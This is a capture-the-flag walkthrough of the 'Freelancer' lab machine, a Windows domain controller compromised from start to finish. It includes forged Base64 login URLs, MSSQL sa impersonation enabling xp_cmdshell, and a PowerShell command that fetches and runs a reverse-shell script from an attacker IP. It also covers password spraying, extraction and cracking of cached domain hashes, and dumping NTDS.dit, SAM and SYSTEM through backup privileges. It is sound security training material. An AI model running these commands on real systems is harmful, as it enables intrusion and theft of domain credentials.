Week 7. Freelancer
TL;DR
This is a Windows Server 2019 machine acting as a domain controller and hosting a job search web site. User IDs are Base64 encoded in the URLs, so we can just sign up an account and escalate to web administrator just manipulating the URL. Once in the administrator dashboard, we use a MSSQL console to escalate to sa user and enable xp_cmdshell commands, that we use to get a reverse shell and collect the user flag.
Regarding escalation, first we find a memory dump in the file system from where, once opened with a forensics tool, we can extract several hashes. One of the hashes can be cracked and enables a lateral movement to another user with permissions to restore AD objects from the recycle bin. We recover a deleted AD user account that in turn has SeBackupPrivilege enabled. We abuse this to backup SAM, SYSTEM and NTDS.dit files, from where we can extract domain administrator hash.
KEYWORDS
MSSQL escalation, xp_cmdshell, MemProcFS, Pypykatz, AD recycle bin, SeBackupPrivilege, Impacket, changepassword.py, SAM, SYSTEM, NTDS.dit, secretsdump.py.
REFERENCES
https://github.com/martinsohn/PowerShell-reverse-shell/blob/main/powershell-reverse-shell.ps1
https://github.com/ufrisk/MemProcFS
https://github.com/skelsec/pypykatz
https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960#ac58
ENUMERATION
Port scan.
> for ports in $(nmap $target -p- --min-rate=5000 -Pn --open --reason | grep open | awk -F "/" '{print $1}' | tr '\n' ',' | sed s/,$//); do nmap $target -p$ports -sV -sC -Pn -vv -n && echo "\nList of open ports: $ports";done
Starting Nmap 7.93 ( https://nmap.org ) at 2025-01-11 22:23 GMT
Nmap scan report for 10.10.11.5
Host is up, received user-set (0.058s latency).
Scanned at 2025-01-11 22:23:42 GMT for 72s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack nginx 1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
|_http-server-header: nginx/1.25.5
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-01-12 03:26:28Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open msrpc syn-ack Microsoft Windows RPC
49676/tcp open msrpc syn-ack Microsoft Windows RPC
49677/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49680/tcp open msrpc syn-ack Microsoft Windows RPC
49685/tcp open msrpc syn-ack Microsoft Windows RPC
55297/tcp open ms-sql-s syn-ack Microsoft SQL Server 2019
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2025-01-12T03:27:35+00:00; +5h02m41s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-01-12T02:16:21
| Not valid after: 2055-01-12T02:16:21
| MD5: 1401da9f484054bc111cb6a5d6e013ac
| SHA-1: 318ef71538f6995e5c8bb0328bfdc6cde5756adc
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQNzt1neEllblK3ydUOq7puDANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjUwMTEyMDIxNjIxWhgPMjA1NTAxMTIwMjE2MjFaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANGhH1In
| I3yFpTxbXHlrV3gF6kjrbO1kgIAju3yUcwVpSWZjJxoCx0K97Vlquydh3ETEokU0
| E1zd2MLJ6C3EhidMJMfP3zlIL8yke72F8Cs2/o7lwo2NPU/eGRcpiAUbgapLspNy
| YSQvKc/J6+s2RuZCO0hklyD8POBhb1F5cdvRMV00oP6MvJz/kG8eqGuQJzjr0Eog
| rO82Pkv1nscnyaTjMCA1vJcY3klStjV9lU5Ee9ZJBBQ4b6m74Iisp8Rq9eGGW37t
| Fxj6EF1+jmaiyJgDHq8Mvu16LRTfCpbNWNS/MesDhBtyUmxqlgmBbVlDVPYgpVCF
| EClNLAAf3ilRfukCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAYeESeCIkIt5oLshq
| PpAngg42DB7V7jYxqznbndNDAMAgXq2BxpUXgW5oig2SqbHpFJ7WEJvcFx5m0ahe
| bHOI4bMY645p0Coq6dsZLDUTvWd7sQxOtn9UGMo3zPV3Ubv3gvc7BrT+X1/A+EN8
| T3P8WQ98mJxHa4K87rzyT6O5j838ANH/TEBGd1PSAlRzJV56gPRPEyvzFpcvS+sI
| GGFwRKxCe0KrsvN7mtyWFZb4mgfGo1nXQ9yVBAxGzeH22HlWaXwNV573Iy7WdB92
| evpUsfzjztr4OZaua8qMynVKD0EtCQDjtIOisrizcAB9E0vEMHWN5z7SZci3hp7/
| JuvXXg==
|_-----END CERTIFICATE-----
63189/tcp open msrpc syn-ack Microsoft Windows RPC
63193/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 5h02m40s, deviation: 0s, median: 5h02m39s
| smb2-time:
| date: 2025-01-12T03:27:26
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 44972/tcp): CLEAN (Couldn't connect)
| Check 2 (port 53827/tcp): CLEAN (Couldn't connect)
| Check 3 (port 55524/udp): CLEAN (Failed to receive data)
| Check 4 (port 39397/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Nmap done: 1 IP address (1 host up) scanned in 72.88 seconds
List of open ports: 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49670,49676,49677,49680,49685,55297,63189,63193Looks like a domain controller, add to hosts file and enumerate the web site with Firefox. A job search comes into view, where you can register a new employer account.
Fuzz for hidden content.
> ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 20 -fc 404 -e .php,.html,.txt,.md -u http://freelancer.htb/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://freelancer.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Extensions : .php .html .txt .md
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 20
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 404
________________________________________________
about [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 389ms]
admin [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 399ms]
blog [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 394ms]
contact [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 336ms]
:: Progress: [23565/23565] :: Job [1/1] :: 51 req/sec :: Duration: [0:07:55] :: Errors: 0 ::There is and /admin path for which we still do not have access.
USER
When you try to log in with your created new account it says the "Account is not activated and cannot be authenticated". To bypass this just fill in a "Forgot password" form and reset your password, you'll need your personal answers.
Reset the password and access your user dashboard, then click on "QR-Code".
Scan your QR code and inspect the URL.
It should be something like this: http://freelancer.htb/accounts/login/otp/MTAwMTA=/7e043d891429e7366518e939c521364d
Decode the Base64 part, it returns a 5-digit number.
> echo 'MTAwMTA=' | base64 -d
10010This looks like an user ID; also, in the blog we can find several IDs of users we could impersonate.
For example, this user has ID=10.
To impersonate him, just encode the ID=10 in Base64.
> echo '10' | base64
MTAKThen forge a URL similar to the previous one. Just substitute the Base64 part with the new code: http://freelancer.htb/accounts/login/otp/MTAK/7e043d891429e7366518e939c521364d
Enter the URL and you are in the user's dashboard.
We can try several other IDs, till you find out ID=2 is the admin account. Base64 for "2" is "Mgo=".
Enter URL: http://freelancer.htb/accounts/login/otp/Mgo=/7e043d891429e7366518e939c521364d and you are in the admin dashboard.
Now we can access to the /admin path we found with ffuf before. Here we find an admin dashboard where we can issue MSSQL statements.
Let's try enabling code execution.
> execute enable_xp_cmdshell;
('42000', "[42000] [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]Could not find stored procedure 'enable_xp_cmdshell'. (2812) (SQLExecDirectW)")
> execute xp_cmdshell 'systeminfo';
('42000', "[42000] [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'. (229) (SQLExecDirectW)")No luck, let's try to enable xp_cmdshell manually.
> execute sp_configure 'show advanced options', '1';
RECONFIGURE
> execute sp_configure 'xp_cmdshell', '1';
RECONFIGURE
> execute xp_cmdshell "systeminfo";
('42000', '[42000] [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]User does not have permission to perform this action. (15247) (SQLExecDirectW)')
The application returns a permissions error, so it seems we will need to escalate privileges in MSSQL.
Check if we can impersonate user sa
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';
It seems we can. Now we abuse this to add ourselves to the sysadmin group, for which we need first to know our current username.
> select user_name();
Freelancer_webapp_userAdd ourselves to the sysadmin group.
> execute as login = 'sa'
exec sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
No results. Previous SQL was not a query.The query returns "No results", but is executed successfully.
Now we can enable command execution and test if we can issue commands.
> execute sp_configure 'show advanced options', '1';
RECONFIGURE
> execute sp_configure 'xp_cmdshell', '1';
RECONFIGURE
No results. Previous SQL was not a query.
> execute xp_cmdshell "systeminfo";
output
null
Host Name: DC
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA664
Original Install Date: 5/28/2024, 10:25:02 AM
System Boot Time: 8/31/2024, 5:33:49 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
[02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,294 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,952 MB
Virtual Memory: In Use: 1,847 MB
Page File Location(s): C:\pagefile.sys
Domain: freelancer.htb
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.5
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
nullSeems it works, next step is to send a Powershell reverse shell.
> execute sp_configure 'show advanced options', '1';
RECONFIGURE
> execute sp_configure 'xp_cmdshell', '1';
RECONFIGURE
> exec xp_cmdshell 'powershell -c "IEX (iwr -usebasicparsing http://10.10.14.104/shell.ps1)"'Once inside, make bit of enumeration. In C:\users we see several usernames.
> dir
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 8/31/2024 5:34 PM Administrator
d----- 5/28/2024 10:23 AM lkazanof
d----- 5/28/2024 10:23 AM lorra199
d----- 5/28/2024 10:22 AM mikasaAckerman
d----- 8/27/2023 1:16 AM MSSQLSERVER
d-r--- 5/28/2024 2:13 PM Public
d----- 5/28/2024 10:22 AM sqlbackupoperator
d----- 8/31/2024 5:35 PM sql_svcAnd in C:\users\sql_svc\downloads\sqlexpr-2019_x64_enu there is the configuration file sql-configuration.ini
dir
Directory: C:\users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/27/2024 1:52 PM 1033_ENU_LP
d----- 5/27/2024 1:52 PM redist
d----- 5/27/2024 1:52 PM resources
d----- 5/27/2024 1:52 PM x64
-a---- 9/24/2019 9:00 PM 45 AUTORUN.INF
-a---- 9/24/2019 9:00 PM 784 MEDIAINFO.XML
-a---- 9/29/2023 4:49 AM 16 PackageId.dat
-a---- 9/24/2019 9:00 PM 142944 SETUP.EXE
-a---- 9/24/2019 9:00 PM 486 SETUP.EXE.CONFIG
-a---- 5/27/2024 4:58 PM 724 sql-Configuration.INI
-a---- 9/24/2019 9:00 PM 249448 SQLSETUPBOOTSTRAPPER.DLLThat contains password IL0v3ErenY3ager
Let's spray this password all over the user list.
> crackmapexec winrm freelancer.htb -u ./userlist -p 'IL0v3ErenY3ager' --continue-on-success
WINRM 10.10.11.5 5985 DC [*] Windows 10.0 Build 17763 (name:DC) (domain:freelancer.htb)
WINRM 10.10.11.5 5985 DC [*] http://10.10.11.5:5985/wsman
WINRM 10.10.11.5 5985 DC [-] freelancer.htb\Administrator:IL0v3ErenY3ager "unsupported hash type md4"
WINRM 10.10.11.5 5985 DC [-] freelancer.htb\lkazanof:IL0v3ErenY3ager "unsupported hash type md4"
WINRM 10.10.11.5 5985 DC [-] freelancer.htb\lorra199:IL0v3ErenY3ager "unsupported hash type md4"
WINRM 10.10.11.5 5985 DC [-] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager "unsupported hash type md4"
WINRM 10.10.11.5 5985 DC [-] freelancer.htb\MSSQLSERVER:IL0v3ErenY3ager "unsupported hash type md4"
WINRM 10.10.11.5 5985 DC [-] freelancer.htb\sqlbackupoperator:IL0v3ErenY3ager "unsupported hash type md4"
WINRM 10.10.11.5 5985 DC [-] freelancer.htb\sql_svc:IL0v3ErenY3ager "unsupported hash type md4"
> crackmapexec smb freelancer.htb -u ./userlist -p 'IL0v3ErenY3ager' --continue-on-success
SMB 10.10.11.5 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:freelancer.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.5 445 DC [-] freelancer.htb\Administrator:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB 10.10.11.5 445 DC [-] freelancer.htb\lkazanof:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB 10.10.11.5 445 DC [-] freelancer.htb\lorra199:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB 10.10.11.5 445 DC [+] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager
SMB 10.10.11.5 445 DC [-] freelancer.htb\MSSQLSERVER:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB 10.10.11.5 445 DC [-] freelancer.htb\sqlbackupoperator:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB 10.10.11.5 445 DC [-] freelancer.htb\sql_svc:IL0v3ErenY3ager STATUS_LOGON_FAILURE
Nothing is found in the SMB share.
> smbmap -H freelancer.htb -u mikasaAckerman -p 'IL0v3ErenY3ager'
[+] IP: freelancer.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server shareBut we can use credentials to move laterally to user mikasaackerman with runascs.exe
> .\runascs.exe mikasaAckerman IL0v3ErenY3ager cmd.exe -r 10.10.14.104:9000
And from here collect the user flag.
SYSTEM
Begin from the mikasaackerman shell and take the opportunity to enumerate the system.
> systeminfo
Host Name: DC
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
System Type: x64-based PCIn the desktop there is a text file. It says someone has created a memory dump for troubleshooting purposes.
Hello Mikasa,
I tried once again to work with Liza Kazanoff after seeking her help to
troubleshoot the BSOD issue on the "DATACENTER-2019" computer. As you know, the
problem started occurring after we installed the new update of SQL Server 2019.
I attempted the solutions you provided in your last email, but unfortunately,
there was no improvement. Whenever we try to establish a remote SQL connection to
the installed instance, the server's CPU starts overheating, and the RAM usage
keeps increasing until the BSOD appears, forcing the server to restart.
Nevertheless, Liza has requested me to generate a full memory dump on the
Datacenter and send it to you for further assistance in troubleshooting the
issue.
Best regards,Bring the dump to your Kali machine and extract the DMP file. Open it with MemProcFS forensics tool.
> sudo ./memprocfs -device ../MEMORY.DMP -mount /mnt/memdump -forensic 0
Initialized 64-bit Windows 10.0.17763
============================== MemProcFS ==============================
- Author: Ulf Frisk - pcileech@frizk.net
- Info: https://github.com/ufrisk/MemProcFS
- Discord: https://discord.gg/pcileech
- License: GNU Affero General Public License v3.0
---------------------------------------------------------------------
MemProcFS is free open source software. If you find it useful please
become a sponsor at: https://github.com/sponsors/ufrisk Thank You :)
---------------------------------------------------------------------
- Version: 5.9.14 (Linux)
- Mount Point: /mnt/memprocfs
- Tag: 17763_a3431de6
- Operating System: Windows 10.0.17763 (X64)
==========================================================================In the /mnt/memdump/py/regsecrets directory there is a file called regsecrets-install.txt. It contains instructions to install the regsecrets plugin. Apart from this plugin, also Pypypkatz package is needed, so it may be needed to install it with pip3.
After installing both things, run again the memprocfs command and navigate again to the /mnt/memdump/py/regsecrets directory. This time the tool is able to extract secrets from the dump and copy them to TXT files.
FREELANCER.HTB/Administrator:*2023-10-04
12:55:34*$DCC2$10240#Administrator#67a0c0f193abd932b55fb8916692c361
FREELANCER.HTB/lorra199:*2023-10-04
12:29:00*$DCC2$10240#lorra199#7ce808b78e75a5747135cf53dc6ac3b1
FREELANCER.HTB/liza.kazanof:*2023-10-04
17:31:23*$DCC2$10240#liza.kazanof#ecd6e532224ccad2abcf2369ccb8b679
...
=== LSA Service User Secret ===
History: False
Service name: _SC_MSSQL$DATA
Username: UNKNOWN
00000000: 50 57 4e 33 44 23 6c 30 72 72 40 41 72 6d 65 73 |PWN3D#l0rr@Armes|
00000010: 73 61 31 39 39 |sa199|The DCC2 hashes are cached domain credentials, one of them can be cracked with module 2100. Save the password as it will be needed later.
On the other hand, the extracted LSA secret turns to be valid for a WinRM session as lorra199
Start by enumerating lorra199 permissions and groups.
> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
FREELANCER\AD Recycle Bin Group S-1-5-21-3542429192-2036945976-3483670807-1164 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192There is a group called FREELANCER\AD Recycle Bin. It seems members of this group can read or deleted active directory objects.
To abuse this privileged group, first we enumerate the deleted objects currently being stored in the recycle bin.
> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties sAMAccountName
Deleted : True
DistinguishedName : CN=Deleted Objects,DC=freelancer,DC=htb
Name : Deleted Objects
ObjectClass : container
ObjectGUID : bb081f2b-bd0a-4fc7-b3e9-50e107e961ee
Deleted : True
DistinguishedName : CN=Emily Johnson\0ADEL:0c78ea5f-c198-48da-b5fa-b8554a02f3b6,CN=Deleted Objects,DC=freelancer,DC=htb
Name : Emily Johnson
DEL:0c78ea5f-c198-48da-b5fa-b8554a02f3b6
ObjectClass : user
ObjectGUID : 0c78ea5f-c198-48da-b5fa-b8554a02f3b6
sAMAccountName : ejohnson
Deleted : True
DistinguishedName : CN=James Moore\0ADEL:8194e0a3-b636-4dba-91de-317dfe34f5b5,CN=Deleted Objects,DC=freelancer,DC=htb
Name : James Moore
DEL:8194e0a3-b636-4dba-91de-317dfe34f5b5
ObjectClass : user
ObjectGUID : 8194e0a3-b636-4dba-91de-317dfe34f5b5
sAMAccountName : jmoore
Deleted : True
DistinguishedName : CN=Abigail Morris\0ADEL:80104541-085f-4686-b0a2-26a0cbd7c23c,CN=Deleted Objects,DC=freelancer,DC=htb
Name : Abigail Morris
DEL:80104541-085f-4686-b0a2-26a0cbd7c23c
ObjectClass : user
ObjectGUID : 80104541-085f-4686-b0a2-26a0cbd7c23c
sAMAccountName : abigail.morris
Deleted : True
DistinguishedName : CN=Noah Baker\0ADEL:d955e3c2-6ff5-4b66-8971-2caa60ea72c7,CN=Deleted Objects,DC=freelancer,DC=htb
Name : Noah Baker
DEL:d955e3c2-6ff5-4b66-8971-2caa60ea72c7
ObjectClass : user
ObjectGUID : d955e3c2-6ff5-4b66-8971-2caa60ea72c7
sAMAccountName : noah.baker
Deleted : True
DistinguishedName : CN=tony stark\0ADEL:e7027ba5-1921-488f-b4d8-58d7dac4aca9,CN=Deleted Objects,DC=freelancer,DC=htb
Name : tony stark
DEL:e7027ba5-1921-488f-b4d8-58d7dac4aca9
ObjectClass : user
ObjectGUID : e7027ba5-1921-488f-b4d8-58d7dac4aca9
sAMAccountName : sstark
Deleted : True
DistinguishedName : CN=Liza Kazanof\0ADEL:ebe15df5-e265-45ec-b7fc-359877217138,CN=Deleted Objects,DC=freelancer,DC=htb
Name : Liza Kazanof
DEL:ebe15df5-e265-45ec-b7fc-359877217138
ObjectClass : user
ObjectGUID : ebe15df5-e265-45ec-b7fc-359877217138
sAMAccountName : liza.kazanofNotice for one of the deleted objects (liza.kazanof) we have already cracked the pass. So we will restore this user from the recycle bin and have a WinRM shell as her.
First we need the ObjectGUID of the deleted account.
> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties objectGUID
Deleted : True
DistinguishedName : CN=Liza Kazanof\0ADEL:ebe15df5-e265-45ec-b7fc-359877217138,CN=Deleted Objects,DC=freelancer,DC=htb
Name : Liza Kazanof
DEL:ebe15df5-e265-45ec-b7fc-359877217138
ObjectClass : user
ObjectGUID : ebe15df5-e265-45ec-b7fc-359877217138And now we can restore the user in the AD.
> restore-ADObject -identity 'ebe15df5-e265-45ec-b7fc-359877217138' -newname "liza.kazanof"However, if we try to connect with evil-winrm we receive an authentication error. This can be explained with crackmapexec: the password is expired.
> crackmapexec smb freelancer.htb -u liza.kazanof -p 'RockYou!'
SMB 10.10.11.5 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:freelancer.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.5 445 DC [-] freelancer.htb\liza.kazanof:RockYou! STATUS_PASSWORD_EXPIREDUse Impacket's changepasswd.py to update the password.
> python3 /usr/share/doc/python3-impacket/examples/changepasswd.py freelancer.htb/liza.kazanof:'RockYou!'@freelancer.htb -newpass 'Password123!'
Now it is possible to have a shell as liza.kazanof
> evil-winrm -u liza.kazanof -p 'Password123!' -i freelancer.htbEnumerating her permissions, we see she has SeBackupPrivilege and SeRestorePrivilege. This means she has complete access to the file system, even SAM and SYSTEM registry hives and the Active Directory database, that is stored in the file NTDS.dit in domain controllers.
> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledWe will abuse this with Diskshadow and Robocopy.
In the liza.kazanoff shell, create an script file for Diskshadow.
> echo "set verbose on" > script.dsh;echo "set metadata C:\Windows\Temp\meta.cab" >> script.dsh;echo "set context clientaccessible" >> script.dsh;echo "set context persistent" >> script.dsh;echo "begin backup" >> script.dsh;echo "add volume C: alias cdrive" >> script.dsh;echo "create" >> script.dsh;echo "expose %cdrive% F:" >> script.dsh;echo "end backup" >> script.dsh;echo "exit" >> script.dsh;type script.dshThen convert to ASCII, otherwise Diskshadow will not be able to read it.
> (Get-Content -Path "script.dsh") | Out-File -FilePath "script_ascii.dsh" -Encoding asciiNow we can run the tool passing the ASCII script as an argument.
> diskshadow /s script_ascii.dsh
Then copy the NTDS.dit file with Robocopy to the temporal file created in the C: drive.
> robocopy /B F:\Windows\NTDS .\ntds ntds.dit
Now extract the SAM and SYSTEM hives.
> reg save hklm\system system;
The operation completed successfully.
> reg save hklm\sam sam
The operation completed successfully.Transfer the three files to your Kali machine, then process them and extract all the domain hashes with Impacket's secretsdump.py
> python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam ./sam -system ./system -ntds ./ntds.dit local
And with the domain administrator hash you can read the flag.
You are root.
Last updated